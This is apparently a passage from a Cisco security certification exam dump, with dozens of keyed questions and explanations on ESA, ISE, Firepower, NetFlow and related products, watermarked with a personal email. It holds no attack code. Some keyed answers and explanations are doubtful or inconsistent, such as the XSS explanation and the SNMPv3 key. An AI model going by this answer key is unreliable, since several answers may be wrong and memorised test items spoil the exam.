that have an undetermined verdict. What is causing this issue?

A. The policy was created to send a message to quarantine instead of drop


B. The file has a reputation score that is above the threshold
C. The file has a reputation score that is below the threshold
D. The policy was created to disable file analysis

Answer: C

Explanation

If the file is known to the reputation service but there is insufficient information for a definitive verdict, the
reputation service returns a reputation score based on characteristics of the file such as threat fingerprint
and behavioral analysis. If this score meets or exceeds the configured reputation threshold, the appliance
applies the action that you have configured in the mail policy for files that contain malware.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa11-
1/user_guide/b_ESA_Admin_Guide_11_1/b_ESA_Admin_Guide_chapter_010000.html

From the reference we can deduce that the file reputation score is below the threshold so ESA is not
dropping it.

Question 2

An administrator is trying to determine which applications are being used in the network but does not want
the network devices to send metadata to Cisco Firepower. Which feature should be used to accomplish
this?

A. NetFlow
B. Packet Tracer
C. Network Discovery
D. Access Control

Answer: C

Explanation

NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow
data generated by NetFlow-enabled routers and switches. The flows do not contain actual packet data, but
rather the metadata for communications. It is a standard form of session data that details who, what,
when, and where of network traffic -> Answer A is not correct.

Reference: https://www.cisco.com/c/en/us/solutions/collateral/enterprise-networks/enterprise-network-
security/white-paper-c11-736595.html

Question 3

Which attack is preventable by Cisco ESA but not by the Cisco WSA?

A. buffer overflow
B. DoS
C. SQL injection
D. phishing

Answer: D

Explanation

The following are the benefits of deploying Cisco Advanced Phishing Protection on the Cisco Email Security
Gateway:

Prevents the following:


+ Attacks that use compromised accounts and social engineering.
willsonliam55@gmail.com Skype Apple Kid

+ Phishing, ransomware, zero-day attacks and spoofing.


+ BEC with no malicious payload or URL.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa13-
5/user_guide/b_ESA_Admin_Guide_13-5/m_advanced_phishing_protection.html

Question 4

A Cisco ESA administrator has been tasked with configuring the Cisco ESA to ensure there are no viruses
before quarantined emails are delivered. In addition, delivery of mail from known bad mail servers must
be prevented. Which two actions must be taken in order to meet these requirements? (Choose two)

A. Use outbreak filters from SenderBase


B. Enable a message tracking service
C. Configure a recipient access table
D. Deploy the Cisco ESA in the DMZ
E. Scan quarantined emails using AntiVirus signatures.

Answer: A E

Explanation

We should scan emails using AntiVirus signatures to make sure there are no viruses attached in emails.
Note: A virus signature is the fingerprint of a virus. It is a set of unique data, or bits of code, that allow it
to be identified. Antivirus software uses a virus signature to find a virus in a computer file system, allowing
to detect, quarantine, and remove the virus.

SenderBase is an email reputation service designed to help email administrators research senders, identify
legitimate sources of email, and block spammers. When the Cisco ESA receives messages from known or
highly reputable senders, it delivers them directly to the end user without any content scanning. However,
when the Cisco ESA receives email messages from unknown or less reputable senders, it performs
antispam and antivirus scanning.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa12-
0/user_guide/b_ESA_Admin_Guide_12_0/b_ESA_Admin_Guide_12_0_chapter_0100100.html

-> Therefore Outbreak filters can be used to block emails from bad mail servers.

Web servers and email gateways are generally located in the DMZ so

Note: The recipient access table (RAT), not to be confused with remote-access Trojan (also RAT), is a
Cisco ESA term that defines which recipients are accepted by a public listener.

Question 5

Which type of dashboard does Cisco DNA Center provide for complete control of the network?

A. service management
B. centralized management
C. application management
D. distributed management

Answer: B

Explanation

Cisco’s DNA Center is the only centralized network management system to bring all of this functionality
into a single pane of glass.

Reference: https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/dna-
center/nb-06-dna-center-faq-cte-en.html

Question 6

In an IaaS cloud services model, which security function is the provider responsible for managing?
willsonliam55@gmail.com Skype Apple Kid

A. Internet proxy
B. firewalling virtual machines
C. CASB
D. hypervisor OS hardening

Answer: B

Explanation

In this IaaS model, cloud providers offer resources to users/machines that include computers as virtual
machines, raw (block) storage, firewalls, load balancers, and network devices.

Reference: https://ieeexplore.ieee.org/document/8777457

This is a controversial question but according to the above reference, IaaS is responsible for both virtual
machines and firewall so we believe the answer “firewalling virtual machines” is better than “hypervisor OS
hardening”.

Note: Cloud access security broker (CASB) provides visibility and compliance checks, protects data against
misuse and exfiltration, and provides threat protections against malware such as ransomware.

Question 7

A network engineer has been tasked with adding a new medical device to the network. Cisco ISE is being
used as the NAC server, and the new device does not have a supplicant available. What must be done in
order to securely connect this device to the network?

A. Use MAB with profiling


B. Use MAB with posture assessment.
C. Use 802.1X with posture assessment.
D. Use 802.1X with profiling.

Answer: A

Explanation

As the new device does not have a supplicant, we cannot use 802.1X.

MAC Authentication Bypass (MAB) is a fallback option for devices that don’t support 802.1x. It is virtually
always used in deployments in some way shape or form. MAB works by having the authenticator take the
connecting device’s MAC address and send it to the authentication server as its username and password.
The authentication server will check its policies and send back an Access-Accept or Access-Reject just like
it would with 802.1x.

Cisco ISE Profiling Services provides dynamic detection and classification of endpoints connected to the
network. Using MAC addresses as the unique identifier, ISE collects various attributes for each network
endpoint to build an internal endpoint database. The classification process matches the collected attributes
to prebuilt or user-defined conditions, which are then correlated to an extensive library of profiles. These
profiles include a wide range of device types, including mobile clients (iPads, Android tablets,
Chromebooks, and so on), desktop operating systems (for example, Windows, Mac OS X, Linux, and
others), and numerous non-user systems such as printers, phones, cameras, and game consoles.

Once classified, endpoints can be authorized to the network and granted access based on their profile. For
example, endpoints that match the IP phone profile can be placed into a voice VLAN using MAC
Authentication Bypass (MAB) as the authentication method. Another example is to provide differentiated
network access to users based on the device used. For example, employees can get full access when
accessing the network from their corporate workstation but be granted limited network access when
accessing the network from their personal iPhone.

Reference: https://community.cisco.com/t5/security-documents/ise-profiling-design-guide/ta-p/3739456

Question 8

An engineer is implementing NTP authentication within their network and has configured both the client
and server devices with the command ntp authentication-key 1 md5 Cisc392368270. The server at 1.1.1.1
willsonliam55@gmail.com Skype Apple Kid

is attempting to authenticate to the client at 1.1.1.2, however it is unable to do so. Which command is
required to enable the client to accept the server’s authentication key?

A. ntp peer 1.1.1.1 key 1


B. ntp server 1.1.1.1 key 1
C. ntp server 1.1.1.2 key 1
D. ntp peer 1.1.1.2 key 1

Answer: B

Explanation

To configure an NTP enabled router to require authentication when other devices connect to it, use the
following commands:

NTP_Server(config)#ntp authentication-key 2 md5 securitytut


NTP_Server(config)#ntp authenticate
NTP_Server(config)#ntp trusted-key 2

Then you must configure the same authentication-key on the client router:

NTP_Client(config)#ntp authentication-key 2 md5 securitytut


NTP_Client(config)#ntp authenticate
NTP_Client(config)#ntp trusted-key 2
NTP_Client(config)#ntp server 10.10.10.1 key 2

Note: To configure a Cisco device as a NTP client, use the command ntp server <IP address>. For
example: Router(config)#ntp server 10.10.10.1. This command will instruct the router to query
10.10.10.1 for the time.

Question 9

What is the role of an endpoint in protecting a user from a phishing attack?

A. Use Cisco Stealthwatch and Cisco ISE Integration.


B. Utilize 802.1X network security to ensure unauthorized access to resources.
C. Use machine learning models to help identify anomalies and determine expected sending behavior.
D. Ensure that antivirus and anti malware software is up to date.

Answer: C

Question 10

Drag and drop the NetFlow export formats from the left onto the descriptions on the right.

Answer:
willsonliam55@gmail.com Skype Apple Kid

+ appropriate only for the main cache: Version 5


+ introduced support for aggregation caches: Version 8
+ appropriate only for legacy systems: Version 1
+ introduced extensibility: Version 9

Explanation

The Version 1 format was the initially released version. Do not use the Version 1 format unless you are
using a legacy collection system that requires it. Use Version 9 or Version 5 export format.
Version 5 export format is suitable only for the main cache; it cannot be expanded to support new
features.
Version 8 export format is available only for aggregation caches; it cannot be expanded to support new
features.

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-
book/cfg-nflow-data-expt.html

Question 11

An organization has noticed an increase in malicious content downloads and wants to use Cisco Umbrella
to prevent this activity for suspicious domains while allowing normal web traffic. Which action will
accomplish this task?

A. Set content settings to High


B. Configure the intelligent proxy.
C. Use destination block lists.
D. Configure application block lists.

Answer: B

Explanation

Obviously, if you allow all traffic to these risky domains, users might access malicious content, resulting in
an infection or data leak. But if you block traffic, you can expect false positives, an increase in support
inquiries, and thus, more headaches. By only proxying risky domains, the intelligent proxy delivers more
granular visibility and control.

The intelligent proxy bridges the gap by allowing access to most known good sites without being proxied
and only proxying those that pose a potential risk. The proxy then filters and blocks against specific URLs
hosting malware while allowing access to everything else.

Reference: https://docs.umbrella.com/deployment-umbrella/docs/what-is-the-intelligent-proxy

Question 12

With which components does a southbound API within a software-defined network architecture
communicate?

A. controllers within the network


B. applications
C. appliances
D. devices such as routers and switches

Answer: D

Explanation
willsonliam55@gmail.com Skype Apple Kid

The Southbound API is used to communicate between Controllers and network devices.

Question 13

A network administrator needs to find out what assets currently exist on the network. Third-party systems
need to be able to feed host data into Cisco Firepower. What must be configured to accomplish this?

A. a Network Discovery policy to receive data from the host


B. a Threat Intelligence policy to download the data from the host
C. a File Analysis policy to send file data into Cisco Firepower
D. a Network Analysis policy to receive NetFlow data from the host

Answer: A

Explanation

You can configure discovery rules to tailor the discovery of host and application data to your needs.

The Firepower System can use data from NetFlow exporters to generate connection and discovery events,
and to add host and application data to the network map.

A network analysis policy governs how traffic is decoded and preprocessed so it can be further
evaluated, especially for anomalous traffic that might signal an intrusion attempt -> Answer D is not
correct.

Question 14

When configuring ISAKMP for IKEv1 Phase1 on a Cisco IOS router, an administrator needs to input the
command crypto isakmp key cisco address 0.0.0.0. The administrator is not sure what the IP
addressing in this command issued for. What would be the effect of changing the IP address from 0.0.0.0
to 1.2.3.4?

A. The key server that is managing the keys for the connection will be at 1.2.3.4
B. The remote connection will only be allowed from 1.2.3.4
C. The address that will be used as the crypto validation authority
D. All IP addresses other than 1.2.3.4 will be allowed

Answer: B

Explanation

The command crypto isakmp key cisco address 1.2.3.4 authenticates the IP address of the 1.2.3.4
peer by using the key cisco. The address of “0.0.0.0” will authenticate any address with this key.

Question 15

Which suspicious pattern enables the Cisco Tetration platform to learn the normal behavior of users?

A. file access from a different user


B. interesting file access
willsonliam55@gmail.com Skype Apple Kid

C. user login suspicious behavior


D. privilege escalation

Answer: A

Explanation

The various suspicious patterns for which the Cisco Tetration platform looks in the current release are:
+ Shell code execution: Looks for the patterns used by shell code.
+ Privilege escalation: Watches for privilege changes from a lower privilege to a higher privilege in the
process lineage tree.
+ Side channel attacks: Cisco Tetration platform watches for cache-timing attacks and page table fault
bursts. Using these, it can detect Meltdown, Spectre, and other cache-timing attacks.
+ Raw socket creation: Creation of a raw socket by a nonstandard process (for example, ping).
+ User login suspicious behavior: Cisco Tetration platform watches user login failures and user login
methods.
+ Interesting file access: Cisco Tetration platform can be armed to look at sensitive files.
+ File access from a different user: Cisco Tetration platform learns the normal behavior of which file is
accessed by which user.
+ Unseen command: Cisco Tetration platform learns the behavior and set of commands as well as the
lineage of each command over time. Any new command or command with a different lineage triggers the
interest of the Tetration Analytics platform.

Reference: https://www.cisco.com/c/en/us/products/collateral/data-center-analytics/tetration-
analytics/white-paper-c11-740380.html

Question 16

Due to a traffic storm on the network, two interfaces were error-disabled, and both interfaces sent SNMP
traps. Which two actions must be taken to ensure that interfaces are put back into service? (Choose two)

A. Have Cisco Prime Infrastructure issue an SNMP set command to re-enable the ports after the pre
configured interval.
B. Use EEM to have the ports return to service automatically in less than 300 seconds.
C. Enter the shutdown and no shutdown commands on the interfaces.
D. Enable the snmp-server enable traps command and wait 300 seconds
E. Ensure that interfaces are configured with the error-disable detection and recovery feature

Answer: C E

Explanation

You can also bring up the port by using these commands:


+ The “shutdown” interface configuration command followed by the “no shutdown” interface configuration
command restarts the disabled port.
+ The “errdisable recovery cause …” global configuration command enables the timer to automatically
recover error-disabled state, and the “errdisable recovery interval interval” global configuration command
specifies the time to recover error-disabled state.

Question 17

What is the difference between Cross-site Scripting and SQL Injection attacks?

A. Cross-site Scripting is an attack where code is injected into a database, whereas SQL Injection is an
attack where code is injected into a browser.
B. Cross-site Scripting is a brute force attack targeting remote sites, whereas SQL Injection is a social
engineering attack.
C. Cross-site Scripting is when executives in a corporation are attacked, whereas SQL Injection is when a
database is manipulated.
D. Cross-site Scripting is an attack where code is executed from the server side, whereas SQL Injection is
an attack where code is executed from the client side.

Answer: A
willsonliam55@gmail.com Skype Apple Kid

Explanation

Answer B is not correct because Cross-site Scripting (XSS) is not a brute force attack.
Answer C is not correct because the statement “Cross-site Scripting is when executives in a corporation
are attacked” is not true. XSS is a client-side vulnerability that targets other application users.
Answer D is not correct because the statement “Cross-site Scripting is an attack where code is executed
from the server side”. In fact, XSS is a method that exploits website vulnerability by injecting scripts
that will run at client’s side.

Therefore only answer A is left. In XSS, an attacker will try to inject his malicious code (usually malicious
links) into a database. When other users follow his links, their web browsers are redirected to websites
where attackers can steal data from them. In a SQL Injection, an attacker will try to inject SQL code (via
his browser) into forms, cookies, or HTTP headers that do not use data sanitizing or validation methods of
GET/POST parameters.

Note: The main difference between a SQL and XSS injection attack is that SQL injection attacks are used
to steal information from databases whereas XSS attacks are used to redirect users to websites where
attackers can steal data from them.

Question 18

A network administrator is configuring a switch to use Cisco ISE for 802.1X. An endpoint is failing
authentication and is unable to access the network. Where should the administrator begin troubleshooting
to verify the authentication details?

A. Adaptive Network Control Policy List


B. Context Visibility
C. Accounting Reports
D. RADIUS Live Logs

Answer: D

Explanation

How To Troubleshoot ISE Failed Authentications & Authorizations

Check the ISE Live Logs


Login to the primary ISE Policy Administration Node (PAN).
Go to Operations > RADIUS > Live Logs
(Optional) If the event is not present in the RADIUS Live Logs, go to Operations > Reports > Reports >
Endpoints and Users > RADIUS Authentications
Check for Any Failed Authentication Attempts in the Log
willsonliam55@gmail.com Skype Apple Kid

Reference: https://community.cisco.com/t5/security-documents/how-to-troubleshoot-ise-failed-
authentications-amp/ta-p/3630960

Question 19

What is a prerequisite when integrating a Cisco ISE server and an AD domain?

A. Place the Cisco ISE server and the AD server in the same subnet
B. Configure a common administrator account
C. Configure a common DNS server
D. Synchronize the clocks of the Cisco ISE server and the AD server

Answer: D

Explanation

The following are the prerequisites to integrate Active Directory with Cisco ISE.
+ Use the Network Time Protocol (NTP) server settings to synchronize the time between the Cisco ISE
server and Active Directory. You can configure NTP settings from Cisco ISE CLI.

+ If your Active Directory structure has multidomain forest or is divided into multiple forests, ensure that
trust relationships exist between the domain to which Cisco ISE is connected and the other domains that
have user and machine information to which you need access. For more information on establishing trust
relationships, refer to Microsoft Active Directory documentation.

+ You must have at least one global catalog server operational and accessible by Cisco ISE, in the domain
to which you are joining Cisco ISE.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/2-
0/ise_active_directory_integration/b_ISE_AD_integration_2x.html#reference_8DC463597A644A5C9CF5D5
82B77BB24F

Question 20

An organization recently installed a Cisco WSA and would like to take advantage of the AVC engine to
allow the organization to create a policy to control application specific activity. After enabling the AVC
engine, what must be done to implement this?

A. Use security services to configure the traffic monitor, .


B. Use URL categorization to prevent the application traffic.
C. Use an access policy group to configure application control settings.
D. Use web security reporting to validate engine functionality

Answer: C

Explanation

The Application Visibility and Control (AVC) engine lets you create policies to control application activity on
the network without having to fully understand the underlying technology of each application. You can
configure application control settings in Access Policy groups. You can block or allow applications
individually or according to application type. You can also apply controls to particular application types.

Question 21

Which method is used to deploy certificates and configure the supplicant on mobile devices to gain access
to network resources?

A. BYOD on boarding
B. Simple Certificate Enrollment Protocol
C. Client provisioning
D. MAC authentication bypass

Answer: A

Explanation
willsonliam55@gmail.com Skype Apple Kid

When supporting personal devices on a corporate network, you must protect network services and
enterprise data by authenticating and authorizing users (employees, contractors, and guests) and their
devices. Cisco ISE provides the tools you need to allow employees to securely use personal devices on a
corporate network.

Guests can add their personal devices to the network by running the native supplicant provisioning
(Network Setup Assistant), or by adding their devices to the My Devices portal.

Because native supplicant profiles are not available for all devices, users can use the My Devices portal to
add these devices manually; or you can configure Bring Your Own Device (BYOD) rules to register these
devices.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/2-
4/admin_guide/b_ISE_admin_guide_24/m_ise_devices_byod.html

Question 22

Refer to the exhibit.

import requests
url = https://api.amp.cisco.com/v1/computers
headers = {
'accept' : application/json
'content-type' : application/json
'authorization' : Basic API Credentials
'cache-control' : "no cache"
}
response = requests.request ("GET", url, headers = headers)
print (response.txt)

What will happen when this Python script is run?

A. The compromised computers and malware trajectories will be received from Cisco AMP
B. The list of computers and their current vulnerabilities will be received from Cisco AMP
C. The compromised computers and what compromised them will be received from Cisco AMP
D. The list of computers, policies, and connector statuses will be received from Cisco AMP

Answer: D

Explanation

The call to API of “https://api.amp.cisco.com/v1/computers” allows us to fetch list of computers across


your organization that Advanced Malware Protection (AMP) sees

Reference: https://api-
docs.amp.cisco.com/api_actions/details?api_action=GET+%2Fv1%2Fcomputers&api_host=api.apjc.amp.ci
sco.com&api_resource=Computer&api_version=v1

It also lists policies and connector statuses as well. The figure below shows partial output of this script:
willsonliam55@gmail.com Skype Apple Kid

Question 23

An organization is trying to implement micro-segmentation on the network and wants to be able to gain
visibility on the applications within the network. The solution must be able to maintain and force
compliance. Which product should be used to meet these requirements?

A. Cisco Umbrella
B. Cisco AMP
C. Cisco Stealthwatch
D. Cisco Tetration

Answer: D

Explanation

Micro-segmentation secures applications by expressly allowing particular application traffic and, by default,
denying all other traffic. Micro-segmentation is the foundation for implementing a zero-trust security
model for application workloads in the data center and cloud.

Cisco Tetration is an application workload security platform designed to secure your compute instances
across any infrastructure and any cloud. To achieve this, it uses behavior and attribute-driven
microsegmentation policy generation and enforcement. It enables trusted access through automated,
exhaustive context from various systems to automatically adapt security policies.
willsonliam55@gmail.com Skype Apple Kid

To generate accurate microsegmentation policy, Cisco Tetration performs application dependency mapping
to discover the relationships between different application tiers and infrastructure services. In addition, the
platform supports “what-if” policy analysis using real-time data or historical data to assist in the validation
and risk assessment of policy application pre-enforcement to ensure ongoing application availability. The
normalized microsegmentation policy can be enforced through the application workload itself for a
consistent approach to workload microsegmentation across any environment, including virtualized, bare-
metal, and container workloads running in any public cloud or any data center. Once the
microsegmentation policy is enforced, Cisco Tetration continues to monitor for compliance deviations,
ensuring the segmentation policy is up to date as the application behavior change.

Reference: https://www.cisco.com/c/en/us/products/collateral/data-center-analytics/tetration-
analytics/solution-overview-c22-739268.pdf

Question 24

Which factor must be considered when choosing the on-premise solution over the cloud-based one?

A. With an on-premise solution, the provider is responsible for the installation and maintenance of the
product, whereas with a cloud-based solution, the customer is responsible for it
B. With a cloud-based solution, the provider is responsible for the installation, but the customer is
responsible for the maintenance of the product.
C. With an on-premise solution, the provider is responsible for the installation, but the customer is
responsible for the maintenance of the product.
D. With an on-premise solution, the customer is responsible for the installation and maintenance of the
product, whereas with a cloud-based solution, the provider is responsible for it.

Answer: D

Question 25

Which term describes when the Cisco Firepower downloads threat intelligence updates from Cisco Talos?

A. consumption
B. sharing
C. analysis
D. authoring

Answer: A

Explanation

… we will showcase Cisco Threat Intelligence Director (CTID) an exciting feature on Cisco’s Firepower
Management Center (FMC) product offering that automates the operationalization of threat intelligence.
TID has the ability to consume threat intelligence via STIX over TAXII and allows uploads/downloads of
STIX and simple blacklists.

Reference: https://blogs.cisco.com/developer/automate-threat-intelligence-using-cisco-threat-intelligence-
director

Question 26

An organization has a Cisco Stealthwatch Cloud deployment in their environment. Cloud logging is working
as expected, but logs are not being received from the on-premise network, what action will resolve this
issue?

A. Configure security appliances to send syslogs to Cisco Stealthwatch Cloud


B. Configure security appliances to send NetFlow to Cisco Stealthwatch Cloud
C. Deploy a Cisco FTD sensor to send events to Cisco Stealthwatch Cloud
D. Deploy a Cisco Stealthwatch Cloud sensor on the network to send data to Cisco Stealthwatch Cloud

Answer: D

Explanation
willsonliam55@gmail.com Skype Apple Kid

You can also monitor on-premises networks in your organizations using Cisco Stealthwatch Cloud. In order
to do so, you need to deploy at least one Cisco Stealthwatch Cloud Sensor appliance (virtual or physical
appliance).

Reference: CCNP And CCIE Security Core SCOR 350-701 Official Cert Guide

Question 27

What does Cisco AMP for Endpoints use to help an organization detect different families of malware?

A. Ethos Engine to perform fuzzy fingerprinting


B. Tetra Engine to detect malware when me endpoint is connected to the cloud
C. Clam AV Engine to perform email scanning
D. Spero Engine with machine learning to perform dynamic analysis

Answer: A

Explanation

ETHOS is the Cisco file grouping engine. It allows us to group families of files together so if we see
variants of a malware, we mark the ETHOS hash as malicious and whole families of malware are instantly
detected.

Reference: https://docs.amp.cisco.com/AMP%20for%20Endpoints%20User%20Guide.pdf

ETHOS = Fuzzy Fingerprinting using static/passive heuristics

Reference: https://www.ciscolive.com/c/dam/r/ciscolive/emea/docs/2016/pdf/BRKSEC-2139.pdf

Question 28

What are two characteristics of Cisco DNA Center APIs? (Choose two)

A. Postman is required to utilize Cisco DNA Center API calls.


B. They do not support Python scripts.
C. They are Cisco proprietary.
D. They quickly provision new devices.
E. They view the overall health of the network

Answer: D E

Question 29

What is a benefit of conducting device compliance checks?

A. It indicates what type of operating system is connecting to the network.


B. It validates if anti-virus software is installed.
C. It scans endpoints to determine if malicious activity is taking place.
D. It detects email phishing attacks.

Answer: B

Question 30

In which two ways does Easy Connect help control network access when used with Cisco TrustSec?
(Choose two)

A. It allows multiple security products to share information and work together to enhance security posture
in the network.
B. It creates a dashboard in Cisco ISE that provides full visibility of all connected endpoints.
C. It allows for the assignment of Security Group Tags and does not require 802.1x to be configured on
the switch or the endpoint.
D. It integrates with third-party products to provide better visibility throughout the network.
E. It allows for managed endpoints that authenticate to AD to be mapped to Security Groups (PassiveID).
willsonliam55@gmail.com Skype Apple Kid

Answer: C E

Explanation

Easy Connect simplifies network access control and segmentation by allowing the assignment of Security
Group Tags to endpoints without requiring 802.1X on those endpoints, whether using wired or wireless
connectivity.

Reference: https://www.cisco.com/c/dam/en/us/solutions/collateral/enterprise-
networks/trustsec/trustsec-with-easy-connect-configuration-guide.pdf

Question 31

What is the benefit of installing Cisco AMP for Endpoints on a network?

A. It provides operating system patches on the endpoints for security.


B. It provides flow-based visibility for the endpoints network connections.
C. It enables behavioral analysis to be used for the endpoints.
D. It protects endpoint systems through application control and real-time scanning

Answer: D

Question 32

An administrator is configuring a DHCP server to better secure their environment. They need to be able to
rate-limit the traffic and ensure that legitimate requests are not dropped. How would this be
accomplished?

A. Set a trusted interface for the DHCP server


B. Set the DHCP snooping bit to 1
C. Add entries in the DHCP snooping database
D. Enable ARP inspection for the required VLAN

Answer: A

Explanation

To understand DHCP snooping we need to learn about DHCP spoofing attack first.

DHCP spoofing is a type of attack in that the attacker listens for DHCP Requests from clients and answers
them with fake DHCP Response before the authorized DHCP Response comes to the clients. The fake DHCP
Response often gives its IP address as the client default gateway -> all the traffic sent from the client will
go through the attacker computer, the attacker becomes a “man-in-the-middle”.

The attacker can have some ways to make sure its fake DHCP Response arrives first. In fact, if the
attacker is “closer” than the DHCP Server then he doesn’t need to do anything. Or he can DoS the DHCP
Server so that it can’t send the DHCP Response.

DHCP snooping can prevent DHCP spoofing attacks. DHCP snooping is a Cisco Catalyst feature that
determines which switch ports can respond to DHCP requests. Ports are identified as trusted and
untrusted.
willsonliam55@gmail.com Skype Apple Kid

Only ports that connect to an authorized DHCP server are trusted, and allowed to send all types of DHCP
messages. All other ports on the switch are untrusted and can send only DHCP requests. If a DHCP
response is seen on an untrusted port, the port is shut down.

Question 33

Refer to the exhibit.

import requests
client_id = '<Client id>'
api_key = '<API Key>'
url = 'https://api.amp.cisco.com/v1/computers'
response = requests.get(url, auth=(client_id, api_key))
response_json = response.json()
for computer in response_json[‘data’]
hostname = computer[‘hostname’]
print(hostname)

What will happen when the Python script is executed?

A. The hostname will be translated to an IP address and printed.


B. The hostname will be printed for the client in the client ID field.
C. The script will pull all computer hostnames and print them.
D. The script will translate the IP address to FODN and print it

Answer: C

Question 34

Refer to the exhibit.


willsonliam55@gmail.com Skype Apple Kid

When configuring a remote access VPN solution terminating on the Cisco ASA, an administrator would like
to utilize an external token authentication mechanism in conjunction with AAA authentication using
machine certificates. Which configuration item must be modified to allow this?

A. Group Policy
B. Method
C. SAML Server
D. DHCP Servers

Answer: B

Explanation

In order to use AAA along with an external token authentication mechanism, set the “Method” as “Both” in
the Authentication.

Question 35

An engineer has been tasked with implementing a solution that can be leveraged for securing the cloud
users, data, and applications. There is a requirement to use the Cisco cloud native CASB and cloud
cybersecurity platform. What should be used to meet these requirements?

A. Cisco Umbrella
B. Cisco Cloud Email Security
C. Cisco NGFW
D. Cisco Cloudlock
willsonliam55@gmail.com Skype Apple Kid

Answer: D

Explanation

Cisco Cloudlock: Secure your cloud users, data, and applications with the cloud-native Cloud Access
Security Broker (CASB) and cloud cybersecurity platform.

Reference: https://www.cisco.com/c/dam/en/us/products/collateral/security/cloud-web-security/at-a-
glance-c45-738565.pdf

Question 36

An engineer needs a cloud solution that will monitor traffic, create incidents based on events, and
integrate with other cloud solutions via an API. Which solution should be used to accomplish this goal?

A. SIEM
B. CASB
C. Adaptive MFA
D. Cisco Cloudlock

Answer: D

Explanation

+ Cisco Cloudlock continuously monitors cloud environments with a cloud Data Loss Prevention (DLP)
engine to identify sensitive information stored in cloud environments in violation of policy.
+ Cloudlock is API-based.
+ Incidents are a key resource in the Cisco Cloudlock application. They are triggered by the Cloudlock
policy engine when a policy detection criteria result in a match in an object (document, field, folder, post,
or file).

Reference: https://docs.umbrella.com/cloudlock-documentation/docs/endpoints

Note:

+ Security information and event management (SIEM) platforms collect log and event data from security
systems, networks and computers, and turn it into actionable security insights.

+ An incident is a record of the triggering of an alerting policy. Cloud Monitoring opens an incident when a
condition of an alerting policy has been met.

Question 37

Why is it important to implement MFA inside of an organization?

A. To prevent man-the-middle attacks from being successful.


B. To prevent DoS attacks from being successful.
C. To prevent brute force attacks from being successful.
D. To prevent phishing attacks from being successful.

Answer: C

Question 38

Drag and drop the solutions from the left onto the solution’s benefits on the right.
willsonliam55@gmail.com Skype Apple Kid

Answer:

+ software-defined segmentation that uses SGTs and allows administrators to quickly scale and enforce
policies across the network: Cisco TrustSec
+ rapidly collects and analyzes NetFlow and telemetry data to deliver in-depth visibility and understanding
of network traffic: Cisco Stealthwatch
+ secure Internet gateway in the cloud that provides a security solution that protects endpoints on and off
the network against threats on the Internet by using DNS: Cisco Umbrella
+ obtains contextual identity and profiles for all the users and devices connected on a network: Cisco ISE

Question 39

A network administrator is configuring SNMPv3 on a new router. The users have already been created;
however, an additional configuration is needed to facilitate access to the SNMP views. What must the
administrator do to accomplish this?

A. map SNMPv3 users to SNMP views


B. set the password to be used for SNMPv3 authentication
C. define the encryption algorithm to be used by SNMPv3
D. specify the UDP port used by SNMP

Answer: B

Question 40

An organization is using Cisco Firepower and Cisco Meraki MX for network security and needs to centrally
manage cloud policies across these platforms. Which software should be used to accomplish this goal?

A. Cisco Defense Orchestrator


B. Cisco Secureworks
C. Cisco DNA Center
D. Cisco Configuration Professional

Answer: A

Explanation

Cisco Defense Orchestrator is a cloud-based management solution that allows you to manage security
policies and device configurations with ease across multiple Cisco and cloud-native security platforms.
willsonliam55@gmail.com Skype Apple Kid

Cisco Defense Orchestrator features:


….
Management of hybrid environments: Managing a mix of firewalls running the ASA, FTD, and Meraki
MX software is now easy, with the ability to share policy elements across platforms.

Reference: https://www.cisco.com/c/en/us/products/collateral/security/defense-orchestrator/datasheet-
c78-736847.html

Question 41

What is a function of 3DES in reference to cryptography?

A. It hashes files.
B. It creates one-time use passwords.
C. It encrypts traffic.
D. It generates private keys.

Answer: C

Question 42

Which risk is created when using an Internet browser to access cloud-based service?

A. misconfiguration of infrastructure, which allows unauthorized access


B. intermittent connection to the cloud connectors
C. vulnerabilities within protocol
D. insecure implementation of API

Answer: C

Question 43

An organization has a Cisco ESA set up with policies and would like to customize the action assigned for
violations. The organization wants a copy of the message to be delivered with a message added to flag it
as a DLP violation. Which actions must be performed in order to provide this capability?

A. deliver and send copies to other recipients


B. quarantine and send a DLP violation notification
C. quarantine and alter the subject header with a DLP violation
D. deliver and add disclaimer text

Answer: D

Explanation

You specify primary and secondary actions that the appliance will take when it detects a possible DLP
violation in an outgoing message. Different actions can be assigned for different violation types and
severities.
Primary actions include:
– Deliver
– Drop
– Quarantine

Secondary actions include:


– Sending a copy to a policy quarantine if you choose to deliver the message. The copy is a perfect clone
of the original, including the Message ID. Quarantining a copy allows you to test the DLP system before
deployment in addition to providing another way to monitor DLP violations. When you release the copy
from the quarantine, the appliance delivers the copy to the recipient, who will have already received the
original message.
– Encrypting messages. The appliance only encrypts the message body. It does not encrypt the message
headers.
– Altering the subject header of messages containing a DLP violation.
– Adding disclaimer text to messages.
willsonliam55@gmail.com Skype Apple Kid

– Sending messages to an alternate destination mailhost.


– Sending copies (bcc) of messages to other recipients. (For example, you could copy messages with
critical DLP violations to a compliance officer’s mailbox for examination.)
– Sending a DLP violation notification message to the sender or other contacts, such as a manager or DLP
compliance officer.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa12-
0/user_guide/b_ESA_Admin_Guide_12_0/b_ESA_Admin_Guide_chapter_010001.html

Question 44

Drag and drop the common security threats from left onto the definitions on the right.

Answer:

+ group of computers connected to the Internet that have been compromised by a hacker using a virus or
Trojan horse: botnet
+ a software program that copies itself from one computer to another, without human interaction: worm
+ fraudulent attempts by cyber criminals to obtain private information: phishing
+ unwanted messages in an email inbox: spam

Question 45

Refer to the exhibit.


willsonliam55@gmail.com Skype Apple Kid

An administrator is adding a new Cisco FTD device to their network and wants to manage it with Cisco
FMC. The Cisco FTD is not behind a NAT device. Which command is needed to enable this on the Cisco
FTD?

A. configure manager add DONTRESOLVE <registration key>


B. configure manager add <FMC IP address> <registration key> 16
C. configure manager add DONTRESOLVE <registration key> FTD123
D. configure manager add <FMC IP address> <registration key>

Answer: D

Explanation

The “Add device” dialog above is from the FMC when we want to add a new FTD. To let FMC manages FTD,
first we need to add manager from the FTD and assign a register key of your choice with the
command configure manager add 1.1.1.1 the_registration_key_you_want, (suppose 1.1.1.1 is the IP
